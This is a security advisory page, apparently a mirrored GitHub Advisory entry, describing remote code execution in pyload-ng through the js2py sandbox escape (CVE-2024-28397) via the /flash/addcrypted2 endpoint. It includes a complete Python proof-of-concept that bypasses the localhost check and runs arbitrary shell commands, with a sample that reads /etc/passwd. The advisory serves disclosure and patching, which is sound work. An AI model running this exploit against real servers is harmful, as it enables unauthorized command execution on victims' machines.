Lucene search

GitHub Advisory DatabaseGHSA-R9PP-R4XF-597R

HistorySep 09, 2024 - 6:17 p.m.

pyload-ng vulnerable to RCE with js2py sandbox escape

2024-09-0918:17:20

CWE-94

GitHub Advisory Database

github.com

pyload-ng

rce

vulnerability

js2py

sandbox escape

cve-2024-28397

api endpoint

http header

python3.11

poc

impact

CVSS3

5.3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

AI Score

Confidence

Low

EPSS

0.001

Percentile

22.7%

JSON

Summary

Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately.

Details

js2py has a vulnerability of sandbox escape assigned as CVE-2024-28397, which is used by the /flash/addcrypted2 API endpoint of pyload-ng. Although this endpoint is designed to only accept localhost connection, we can bypass this restriction using HTTP Header, thus accessing this API and achieve RCE.

PoC

The PoC is provided as poc.py below, you can modify the shell command it execute:

import socket
import base64
from urllib.parse import quote

host, port = input("host: "), int(input("port: "))

payload = """
// [+] command goes here:
let cmd = "head -n 1 /etc/passwd; calc; gnome-calculator;"
let hacked, bymarve, n11
let getattr, obj

hacked = Object.getOwnPropertyNames({})
bymarve = hacked.__getattribute__
n11 = bymarve("__getattribute__")
obj = n11("__class__").__base__
getattr = obj.__getattribute__

function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}

n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
function f() {
    return n11
}

"""

crypted_b64 = base64.b64encode(b"1234").decode()

data = f"package=pkg&crypted={quote(crypted_b64)}&jk={quote(payload)}"

request = f"""\
POST /flash/addcrypted2 HTTP/1.1
Host: 127.0.0.1:9666
Content-Type: application/x-www-form-urlencoded
Content-Length: {len(data)}

{data}
""".encode().replace(b"\n", b"\r\n")

def main():

    s = socket.socket()
    s.connect((host, port))

    s.send(request)
    response = s.recv(1024).decode()
    print(response)

if __name__ == "__main__":
    main()

Impact

Anyone who runs the latest version (<=0.5.0b3.dev85) of pyload-ng under python3.11 or below. pyload-ng doesn’t use js2py for python3.12 or above.

Affected configurations

Vulners

Node

pyload-ng_projectpyload-ngRange≤0.5.0b3.dev85python

VendorProductVersionCPE
pyload-ng_projectpyload-ng*cpe:2.3:a:pyload-ng_project:pyload-ng:*:*:*:*:*:python:*:*

Vendor	Product	Version	CPE
pyload-ng_project	pyload-ng	*	cpe:2.3:a:pyload-ng_project:pyload-ng::::::python::*

References

github.com/advisories/GHSA-h95x-26f3-88hr

github.com/advisories/GHSA-r9pp-r4xf-597r

github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape

github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r